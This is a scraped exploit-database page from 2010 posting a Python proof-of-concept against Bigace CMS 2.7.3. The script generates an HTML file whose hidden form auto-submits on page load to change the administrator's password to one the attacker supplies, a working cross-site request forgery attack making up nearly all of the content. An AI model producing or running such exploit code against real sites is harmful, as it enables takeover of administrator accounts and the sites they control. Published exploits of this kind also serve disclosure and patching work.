[webapps / 0day] - Bigace_2.7.3 CSRF Change Admin Password P
Posted on 26 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Bigace_2.7.3 CSRF Change Admin Password POC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Bigace_2.7.3 CSRF Change Admin Password POC by Sweet in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=========================================== Bigace_2.7.3 CSRF Change Admin Password POC =========================================== #!/usr/bin/python #Exploit Title : Bigace_2.7.3 CSRF Change admin password POC #Software : Bigace 2.7.3 #Software link : http://www.bigace.de/download.html #Autor : Sweet #Email : charif38@hotmail.fr #Date : 26/10/2010 #Software version : 2.7.3 #Software detail: BIGACE - Dynamic Web CMS - is a free, professional grade software package that allows you to set up your own Website within minutes. # Its powerful backend puts you in full control of the layout, service and content of your Pages. # BIGACE is written in the popular language PHP and uses a MySQL database. It is designed to provide #you with all the features you # need from a CMS while having an absolute minimal impact on the resources of the server. #Vulnerability detail: Also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website # whereby unauthorized commands are transmitted from a user that the website trusts. # Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. # int two word you need the cookie of the user that you wanna attack #thx to Heni Kraiem , Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org #et 1,2,3 viva L'Algerie import sys if len(sys.argv) != 3: print """Usage: ./exploit.py <Url and bigace patch> <Your new password> Example: ./exploit.py http://172.16.233.128:80/bigacecms/ mypassword """ quit() url = sys.argv[1] passw = sys.argv[2] Skel ="""<body onload="document.getElementById('1').submit()"> <form method="POST" id="1" name="form0" action="%spublic/index.php?cmd=admin&id=userAdmin_tADMIN_len"> <input type="hidden" name="mode" value="changePassword"/> <input type="hidden" name="data[id]" value="1"/> <input type="hidden" name="passwordnew" value="%s"/> <input type="hidden" name="passwordcheck" value="%s"/> </form> """ % (url,passw,passw) try : print "[+] Writing the exploit [+]" FP = file("bigaceCSRF.html" , "w") FP.write(Skel) FP.close() print "[+] Exploit writed succesfully [+]" except : print "[+] Error while trying to write the exploit [+]" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>
